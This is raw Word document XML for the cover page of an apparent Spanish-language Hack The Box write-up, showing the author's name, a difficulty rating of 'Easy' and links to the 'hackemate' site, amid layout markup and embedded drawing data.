                              <w:t>Hecho por: Gianpaul Custodio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E62801" id="_x0000_s1030" style="position:absolute;left:0;text-align:left;margin-left:139.6pt;margin-top:14.2pt;width:154pt;height:23.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BxuXAIAAAMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVN9v2jAQfp+0/8Hy+xqCoCuooUJUnSZV&#10;bVVa9dk4NkRzfN7ZkLC/fmcTQtfxNO3F8fnuu5/f5fqmrQ3bKfQV2ILnFwPOlJVQVnZd8NeXuy9X&#10;nPkgbCkMWFXwvfL8Zvb503XjpmoIGzClQkZOrJ82ruCbENw0y7zcqFr4C3DKklID1iKQiOusRNGQ&#10;99pkw8HgMmsAS4cglff0entQ8lnyr7WS4VFrrwIzBafcQjoxnat4ZrNrMV2jcJtKdmmIf8iiFpWl&#10;oL2rWxEE22L1l6u6kggedLiQUGegdSVVqoGqyQcfqlluhFOpFmqOd32b/P9zKx92S/eE1IbG+amn&#10;a6yi1VjHL+XH2tSsfd8s1QYm6TGfjMdXA+qpJN1wMp7kqZvZCe3Qh28KahYvBUfY2vKZJpIaJXb3&#10;PlBYsj/akXBKIt3C3qiYh7HPSrOqpLDDhE78UAuDbCdoskJKZcNlnCb5S9YRpitjemB+DmhC3oE6&#10;2whTiTc9cHAO+GfEHpGigg09uK4s4DkH5Y8+8sH+WP2h5lh+aFctFV3wUcwxvqyg3D8hQzjw2Dt5&#10;V1Fv74UPTwKJuDQOWsbwSIc20BQcuhtnG8Bf596jPfGJtJw1tAgF9z+3AhVn5rslpk3y0ShuThJG&#10;469DEvC9ZvVeY7f1AmgiOa29k+ka7YM5XjVC/UY7O49RSSWspNgFlwGPwiIcFpS2Xqr5PJnRtjgR&#10;7u3Syeg89jnS5qV9E+g6ggWi5gMcl0ZMP1DsYBuRFubbALpK/Dv1tZsAbVqiUfdXiKv8Xk5Wp3/X&#10;7DcAAAD//wMAUEsDBBQABgAIAAAAIQAtHefW3QAAAAkBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/L&#10;TsMwEEX3SP0Ha5DYIOo0Ig9CnKri8QEUWLBz4yGJsMdR7LahX99hRXfzOLpzpl7PzooDTmHwpGC1&#10;TEAgtd4M1Cn4eH+9K0GEqMlo6wkV/GKAdbO4qnVl/JHe8LCNneAQCpVW0Mc4VlKGtkenw9KPSLz7&#10;9pPTkdupk2bSRw53VqZJkkunB+ILvR7xqcf2Z7t3Cny20benmH4WL1/G4mjbPH8ulbq5njePICLO&#10;8R+GP31Wh4addn5PJgirIC0eUka5KO9BMJCVBQ92CoosAdnU8vKD5gwAAP//AwBQSwECLQAUAAYA&#10;CAAAACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBL&#10;AQItABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BL&#10;AQItABQABgAIAAAAIQCpSBxuXAIAAAMFAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnht&#10;bFBLAQItABQABgAIAAAAIQAtHefW3QAAAAkBAAAPAAAAAAAAAAAAAAAAALYEAABkcnMvZG93bnJl&#10;di54bWxQSwUGAAAAAAQABADzAAAAwAUAAAAA&#10;" fillcolor="white [3201]" strokecolor="#70ad47 [3209]" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6AD599FC" w14:textId="3E8940C8" w:rsidR="00A95022" w:rsidRPr="00663D49" w:rsidRDefault="00A95022" w:rsidP="00A95022">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Times Sans Serif" w:hAnsi="Times Sans Serif" w:cs="Times Sans Serif"/>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="00663D49">
                        <w:rPr>
                          <w:rFonts w:ascii="Times Sans Serif" w:hAnsi="Times Sans Serif" w:cs="Times Sans Serif"/>
                          <w:color w:val="000000" w:themeColor="text1"/>
                          <w:sz w:val="20"/>
                          <w:szCs w:val="20"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t>Hecho por: Gianpaul Custodio</w:t>
                      </w:r>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
              </v:roundrect>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A56118">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2BCC8E0F" wp14:editId="3F781CF5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2543175</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>479114</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="342900" cy="396875"/>
            <wp:effectExtent l="0" t="0" r="0" b="3175"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1483702972" name="Imagen 3" descr="Hack The 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ck The Box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2" t="16125" r="19274" b="11776"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="34290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93B658A" w14:textId="1933C060" w:rsidR="00BA4552" w:rsidRDefault="00B20ED4" w:rsidP="00C6799C">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>________________________________ _______________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E9FE4A8" w14:textId="4015259A" w:rsidR="0051639D" w:rsidRDefault="00795925" w:rsidP="0051639D">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E53B6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="70AD47" w:themeColor="accent6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41DED7B9" wp14:editId="0677B258">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>center</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>258445</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1457325" cy="638810"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="2371136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6393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A3342" w14:textId="762BFFCC" w:rsidR="00B20ED4" w:rsidRPr="00795925" w:rsidRDefault="007A24E7" w:rsidP="00795925">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr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7D5522">
                              <w:rPr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ES"/>
                              </w:rPr>
                              <w:t>DIFICULTAD</w:t>
                            </w:r>
                            <w:r w:rsidR="00795925">
                              <w:rPr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ES"/>
                              </w:rPr>
                              <w:br/>
                            </w:r>
                            <w:r w:rsidR="00B20ED4" w:rsidRPr="00795925"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>Easy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ED7B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1" type="#_x0000_t202" style="position:absolute;margin-left:0;margin-top:20.35pt;width:114.75pt;height:50.3pt;z-index:2517319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x1GPAIAALMEAAAOAAAAZHJzL2Uyb0RvYy54bWysVG1v0zAQ/o7Ef7D8naZN241FTafRMYQ0&#10;XsTgB7iO3VhzfMZ2m5Rfz9lJszKQkBBfItt3z3P33EtW112jyUE4r8CUdDaZUiIMh0qZXUm/fb17&#10;9ZoSH5ipmAYjSnoUnl6vX75YtbYQOdSgK+EIkhhftLakdQi2yDLPa9EwPwErDBoluIYFvLpdVjnW&#10;Inujs3w6vchacJV1wIX3+HrbG+k68UspePgkpReB6JJibiF9Xfpu4zdbr1ixc8zWig9psH/IomHK&#10;YNCR6pYFRvZO/UbVKO7AgwwTDk0GUioukgZUM5s+U/NQMyuSFiyOt2OZ/P+j5R8PD/azI6F7Ax02&#10;MInw9h74oycGNjUzO3HjHLS1YBUGnsWSZa31xQCNpfaFjyTb9gNU2GS2D5CIOumaWBXUSZAdG3Ac&#10;iy66QHgMuVhezvMlJRxtF/Or+fwyhWDFCW2dD+8ENCQeSuqwqYmdHe59iNmw4uQSgxm4U1qnxmrz&#10;7CGKeGuqZAxM6f6MBNEzqYpCBknhqEXEa/NFSKIqTDbv6xOnU2y0IweGc8U4FybkQ9bJO8IkZjEC&#10;h8L+CtShr+boG2EiTe0InP494ohIUcGEEdwoA+5PBNXjGLn3P6nvNceOhm7boeiSLqOw+LKF6ohd&#10;dtBvEW49HmpwPyhpcYNK6r/vmROU6PcGJ+VqtljElUsXbHKOF3du2Z5bmOFIVdJASX/chLSmUZOB&#10;G5woqVKznzIZcsbNSDMwbHFcvfN78nr616x/AgAA//8DAFBLAwQUAAYACAAAACEA/rmbEt0AAAAH&#10;AQAADwAAAGRycy9kb3ducmV2LnhtbEyPvU7DQBCEeyTe4bRIdOQcJ/zE+BwFJAqKFAnQr30b24pv&#10;z/gujuHpWSooRzM7822+nlynRhpC69nAfJaAIq68bbk28P72cvMAKkRki51nMvBFAdbF5UWOmfVn&#10;3tG4j7WSEg4ZGmhi7DOtQ9WQwzDzPbF4Bz84jCKHWtsBz1LuOp0myZ122LIsNNjTc0PVcX9ygjF+&#10;lItV3PgQtof06fUbt+Xx05jrq2nzCCrSFP/C8IsvN1AIU+lPbIPqDMgj0cAyuQclbpqubkGVElvO&#10;F6CLXP/nL34AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h/9YAAACUAQAACwAAAAAA&#10;AAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAp58dRjwCAACzBAAADgAAAAAA&#10;AAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA/rmbEt0AAAAHAQAADwAA&#10;AAAAAAAAAAAAAACWBAAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA8wAAAKAFAAAAAA==&#10;" filled="f" stroked="f" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="388A3342" w14:textId="762BFFCC" w:rsidR="00B20ED4" w:rsidRPr="00795925" w:rsidRDefault="007A24E7" w:rsidP="00795925">
                      <w:pPr>
                        <w:jc w:val="center"/>
                        <w:rPr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ES"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="007D5522">
                        <w:rPr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ES"/>
                        </w:rPr>
                        <w:t>DIFICULTAD</w:t>
                      </w:r>
                      <w:r w:rsidR="00795925">
                        <w:rPr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ES"/>
                        </w:rPr>
                        <w:br/>
                      </w:r>
                      <w:r w:rsidR="00B20ED4" w:rsidRPr="00795925"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>Easy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B1519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C7A6385" wp14:editId="066C968C">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3724910</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3753299</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2118731" cy="498831"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="119312660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731" cy="4988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DB84D9" w14:textId="16D1EB91" w:rsidR="002B1519" w:rsidRPr="002B1519" w:rsidRDefault="002B151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2B1519">
                              <w:rPr>
                                <w:rStyle w:val="Hipervnculo"/>
                                <w:sz w:val="40"/>
                                <w:szCs w:val="40"/>
                                <w:u w:val="none"/>
                              </w:rPr>
                              <w:t>@</w:t>
                            </w:r>
                            <w:hyperlink r:id="rId13" w:history="1">
                              <w:r w:rsidRPr="002B1519">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                  <w:sz w:val="40"/>
                                  <w:szCs w:val="40"/>
                                  <w:u w:val="none"/>
                                </w:rPr>
                                <w:t>hackemateperu</w:t>
                              </w:r>
                            </w:hyperlink>
                            <w:r w:rsidRPr="002B1519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6385" id="Cuadro de texto 15" o:spid="_x0000_s1032" type="#_x0000_t202" style="position:absolute;margin-left:293.3pt;margin-top:295.55pt;width:166.85pt;height:39.3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EmhGgIAADMEAAAOAAAAZHJzL2Uyb0RvYy54bWysU01vGyEQvVfKf0Dc4/U6TuKsvI7cRK4q&#10;WUkkp8oZs+BFYhkK2Lvur+/A+ktpT1UvMDDDfLz3mD52jSY74bwCU9J8MKREGA6VMpuS/nhfXE8o&#10;8YGZimkwoqR74enj7OrLtLWFGEENuhKOYBLji9aWtA7BFlnmeS0a5gdghUGnBNewgEe3ySrHWsze&#10;6Gw0HN5lLbjKOuDCe7x97p10lvJLKXh4ldKLQHRJsbeQVpfWdVyz2ZQVG8dsrfihDfYPXTRMGSx6&#10;SvXMAiNbp/5I1SjuwIMMAw5NBlIqLtIMOE0+/DTNqmZWpFkQHG9PMPn/l5a/7Fb2zZHQfYUOCYyA&#10;tNYXHi/jPJ10TdyxU4J+hHB/gk10gXC8HOX55P4mp4Sjb/wwmaCNabLza+t8+CagIdEoqUNaElps&#10;t/ShDz2GxGIGFkrrRI02pC3p3c3tMD04eTC5Nljj3Gu0QrfuiKrwwXGONVR7HM9Bz7y3fKGwhyXz&#10;4Y05pBonQvmGV1ykBqwFB4uSGtyvv93HeGQAvZS0KJ2S+p9b5gQl+rtBbh7y8ThqLR3Gt/cjPLhL&#10;z/rSY7bNE6A6ET/sLpkxPuijKR00H6jyeayKLmY41i5pOJpPoRc0/hIu5vMUhOqyLCzNyvKYOqIa&#10;EX7vPpizBxoCEvgCR5Gx4hMbfWzPx3wbQKpEVcS5R/UAPyozkX34RVH6l+cUdf7rs98AAAD//wMA&#10;UEsDBBQABgAIAAAAIQB5HSDt4wAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9NT4NAEIbvJv6H&#10;zTTxZhcwRUCWpiFpTIweWnvxNrBbIN0PZLct+usdT3qbyTx553nL9Ww0u6jJD84KiJcRMGVbJwfb&#10;CTi8b+8zYD6glaidVQK+lId1dXtTYiHd1e7UZR86RiHWFyigD2EsOPdtrwz6pRuVpdvRTQYDrVPH&#10;5YRXCjeaJ1GUcoODpQ89jqruVXvan42Al3r7hrsmMdm3rp9fj5vx8/CxEuJuMW+egAU1hz8YfvVJ&#10;HSpyatzZSs+0gFWWpoTSkMcxMCLyJHoA1ghI0/wReFXy/x2qHwAAAP//AwBQSwECLQAUAAYACAAA&#10;ACEAtoM4kv4AAADhAQAAEwAAAAAAAAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQIt&#10;ABQABgAIAAAAIQA4/SH/1gAAAJQBAAALAAAAAAAAAAAAAAAAAC8BAABfcmVscy8ucmVsc1BLAQIt&#10;ABQABgAIAAAAIQCDCEmhGgIAADMEAAAOAAAAAAAAAAAAAAAAAC4CAABkcnMvZTJvRG9jLnhtbFBL&#10;AQItABQABgAIAAAAIQB5HSDt4wAAAAsBAAAPAAAAAAAAAAAAAAAAAHQEAABkcnMvZG93bnJldi54&#10;bWxQSwUGAAAAAAQABADzAAAAhAUAAAAA&#10;" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="4EDB84D9" w14:textId="16D1EB91" w:rsidR="002B1519" w:rsidRPr="002B1519" w:rsidRDefault="002B1519">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                      </w:pPr>
                      <w:r w:rsidRPr="002B1519">
                        <w:rPr>
                          <w:rStyle w:val="Hipervnculo"/>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                          <w:u w:val="none"/>
                        </w:rPr>
                        <w:t>@</w:t>
                      </w:r>
                      <w:hyperlink r:id="rId14" w:history="1">
                        <w:r w:rsidRPr="002B1519">
                          <w:rPr>
                            <w:rStyle w:val="Hipervnculo"/>
                            <w:sz w:val="40"/>
                            <w:szCs w:val="40"/>
                            <w:u w:val="none"/>
                          </w:rPr>
                          <w:t>hackemateperu</w:t>
                        </w:r>
                      </w:hyperlink>
                      <w:r w:rsidRPr="002B1519"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91712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6926407" wp14:editId="66D1BF19">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:posOffset>3620073</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3138170</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2460703" cy="312234"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1953130054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0703" cy="3122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4A12EE" w14:textId="62BCD10F" w:rsidR="00A91712" w:rsidRPr="00A91712" w:rsidRDefault="00000000" w:rsidP="00A91712">
                            <w:pPr>
                              <w:pStyle w:val="t-14"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                <w:sz w:val="28"/>
                                <w:szCs w:val="28"/>
                              </w:rPr>
                            </w:pPr>
                            <w:hyperlink r:id="rId15" w:history="1">
                              <w:r w:rsidR="00A91712">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                  <w:u w:val="none"/>
                                </w:rPr>
                                <w:t>G</w:t>
                              </w:r>
                              <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                  <w:u w:val="none"/>
                                </w:rPr>
                                <w:t>ianpaul</w:t>
                              </w:r>
                              <w:r w:rsidR="00A91712">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                  <w:u w:val="none"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> C</w:t>
                              </w:r>
                              <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                  <w:u w:val="none"/>
                                </w:rPr>
                                <w:t>ustodio</w:t>
                              </w:r>
                              <w:r w:rsidR="00A91712">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                  <w:u w:val="none"/>
                                </w:rPr>
                                <w:t xml:space="preserve"> C</w:t>
                              </w:r>
                              <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                  <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                                  <w:sz w:val="28"/>
                                  <w:szCs w:val="28"/>
                                  <w:u w:val="none"/>
                                </w:rPr>
                                <w:t>havarría</w:t>
                              </w:r>
                            </w:hyperlink>
                            <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                              <w:rPr>
                                <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe U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6E31E1D" w14:textId="3C069551" w:rsidR="00A91712" w:rsidRPr="00A91712" w:rsidRDefault="00A91712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26407" id="_x0000_s1033" type="#_x0000_t202" style="position:absolute;margin-left:285.05pt;margin-top:247.1pt;width:193.75pt;height:24.6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E9zHAIAADMEAAAOAAAAZHJzL2Uyb0RvYy54bWysU8lu2zAQvRfoPxC811rs2K1gOXATuChg&#10;JAGcImeaIi0BFIclaUvu13dIeUPaU9ELNcMZzfLe4/y+bxU5COsa0CXNRiklQnOoGr0r6Y/X1afP&#10;lDjPdMUUaFHSo3D0fvHxw7wzhcihBlUJS7CIdkVnSlp7b4okcbwWLXMjMEJjUIJtmUfX7pLKsg6r&#10;tyrJ03SadGArY4EL5/D2cQjSRawvpeD+WUonPFElxdl8PG08t+FMFnNW7CwzdcNPY7B/mKJljcam&#10;l1KPzDOyt80fpdqGW3Ag/YhDm4CUDRdxB9wmS99ts6mZEXEXBMeZC0zu/5XlT4eNebHE91+hRwID&#10;IJ1xhcPLsE8vbRu+OCnBOEJ4vMAmek84XuaTaTpLx5RwjI2zPB9PQpnk+rexzn8T0JJglNQiLREt&#10;dlg7P6SeU0IzDatGqUiN0qQr6XR8l8YfLhEsrjT2uM4aLN9ve9JUJZ2d99hCdcT1LAzMO8NXDc6w&#10;Zs6/MItU40YoX/+Mh1SAveBkUVKD/fW3+5CPDGCUkg6lU1L3c8+soER918jNl2wyCVqLzuRulqNj&#10;byPb24jetw+A6szwoRgezZDv1dmUFto3VPkydMUQ0xx7l9SfzQc/CBpfCRfLZUxCdRnm13pjeCgd&#10;UA0Iv/ZvzJoTDR4JfIKzyFjxjo0hd+Bjufcgm0hVwHlA9QQ/KjOSfXpFQfq3fsy6vvXFbwAAAP//&#10;AwBQSwMEFAAGAAgAAAAhAKOMZSnjAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj8tOwzAQRfdI&#10;/IM1SOyo05D0kcapqkgVEqKLlm7YOfE0iWqPQ+y2ga/HrGA5ukf3nsnXo9HsioPrLAmYTiJgSLVV&#10;HTUCju/bpwUw5yUpqS2hgC90sC7u73KZKXujPV4PvmGhhFwmBbTe9xnnrm7RSDexPVLITnYw0odz&#10;aLga5C2UG83jKJpxIzsKC63ssWyxPh8uRsBrud3JfRWbxbcuX95Om/7z+JEK8fgwblbAPI7+D4Zf&#10;/aAORXCq7IWUY1pAOo+mARWQLJMYWCCW6XwGrApR8pwAL3L+/4fiBwAA//8DAFBLAQItABQABgAI&#10;AAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsB&#10;Ai0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsB&#10;Ai0AFAAGAAgAAAAhAO9QT3McAgAAMwQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1s&#10;UEsBAi0AFAAGAAgAAAAhAKOMZSnjAAAACwEAAA8AAAAAAAAAAAAAAAAAdgQAAGRycy9kb3ducmV2&#10;LnhtbFBLBQYAAAAABAAEAPMAAACGBQAAAAA=&#10;" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="764A12EE" w14:textId="62BCD10F" w:rsidR="00A91712" w:rsidRPr="00A91712" w:rsidRDefault="00000000" w:rsidP="00A91712">
                      <w:pPr>
                        <w:pStyle w:val="t-14"/>
                        <w:rPr>
                          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                          <w:sz w:val="28"/>
                          <w:szCs w:val="28"/>
                        </w:rPr>
                      </w:pPr>
                      <w:hyperlink r:id="rId16" w:history="1">
                        <w:r w:rsidR="00A91712">
                          <w:rPr>
                            <w:rStyle w:val="Hipervnculo"/>
                            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                            <w:u w:val="none"/>
                          </w:rPr>
                          <w:t>G</w:t>
                        </w:r>
                        <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                          <w:rPr>
                            <w:rStyle w:val="Hipervnculo"/>
                            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                            <w:u w:val="none"/>
                          </w:rPr>
                          <w:t>ianpaul</w:t>
                        </w:r>
                        <w:r w:rsidR="00A91712">
                          <w:rPr>
                            <w:rStyle w:val="Hipervnculo"/>
                            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                            <w:u w:val="none"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> C</w:t>
                        </w:r>
                        <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                          <w:rPr>
                            <w:rStyle w:val="Hipervnculo"/>
                            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                            <w:u w:val="none"/>
                          </w:rPr>
                          <w:t>ustodio</w:t>
                        </w:r>
                        <w:r w:rsidR="00A91712">
                          <w:rPr>
                            <w:rStyle w:val="Hipervnculo"/>
                            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                            <w:u w:val="none"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> C</w:t>
                        </w:r>
                        <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                          <w:rPr>
                            <w:rStyle w:val="Hipervnculo"/>
                            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                            <w:u w:val="none"/>
                          </w:rPr>
                          <w:t>havarría</w:t>
                        </w:r>
                      </w:hyperlink>
                      <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                        <w:rPr>
                          <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe U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36E31E1D" w14:textId="3C069551" w:rsidR="00A91712" w:rsidRPr="00A91712" w:rsidRDefault="00A91712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91712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11DF633" wp14:editId="78A7BD34">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2747087</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2411095</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1657815" cy="498831"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="5764261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815" cy="4988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39F077" w14:textId="0BB0F1D3" w:rsidR="00A91712" w:rsidRPr="00A91712" w:rsidRDefault="0000000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hyperlink r:id="rId17" w:history="1">
                              <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                  <w:sz w:val="40"/>
                                  <w:szCs w:val="40"/>
                                  <w:u w:val="none"/>
                                </w:rPr>
                                <w:t>hackemate.pe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DF633" id="_x0000_s1034" type="#_x0000_t202" style="position:absolute;margin-left:216.3pt;margin-top:189.85pt;width:130.55pt;height:39.3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iuwGgIAADMEAAAOAAAAZHJzL2Uyb0RvYy54bWysU11v2jAUfZ/U/2D5vQQoUBoRKtaKaRJq&#10;K9Gpz8axSSTb17MNCfv1u3b4UrenaS/Ode73Ocezx1YrshfO12AKOuj1KRGGQ1mbbUF/vC9vp5T4&#10;wEzJFBhR0IPw9HF+82XW2FwMoQJVCkewiPF5YwtahWDzLPO8Epr5Hlhh0CnBaRbw6rZZ6ViD1bXK&#10;hv3+JGvAldYBF97j3+fOSeepvpSCh1cpvQhEFRRnC+l06dzEM5vPWL51zFY1P47B/mEKzWqDTc+l&#10;nllgZOfqP0rpmjvwIEOPg85AypqLtANuM+h/2mZdMSvSLgiOt2eY/P8ry1/2a/vmSGi/QosERkAa&#10;63OPP+M+rXQ6fnFSgn6E8HCGTbSB8Jg0Gd9PB2NKOPpGD9PpXSqTXbKt8+GbAE2iUVCHtCS02H7l&#10;A3bE0FNIbGZgWSuVqFGGNAWd3I37KeHswQxlMPEya7RCu2lJXRZ0etpjA+UB13PQMe8tX9Y4w4r5&#10;8MYcUo0boXzDKx5SAfaCo0VJBe7X3/7HeGQAvZQ0KJ2C+p875gQl6rtBbh4Go1HUWrqMxvdDvLhr&#10;z+baY3b6CVCdA3woliczxgd1MqUD/YEqX8Su6GKGY++ChpP5FDpB4yvhYrFIQaguy8LKrC2PpSOq&#10;EeH39oM5e6QhIIEvcBIZyz+x0cV2fCx2AWSdqIo4d6ge4UdlJgaPryhK//qeoi5vff4bAAD//wMA&#10;UEsDBBQABgAIAAAAIQB5xEYG4wAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI9NT4NAEIbvJv6H&#10;zZh4s4t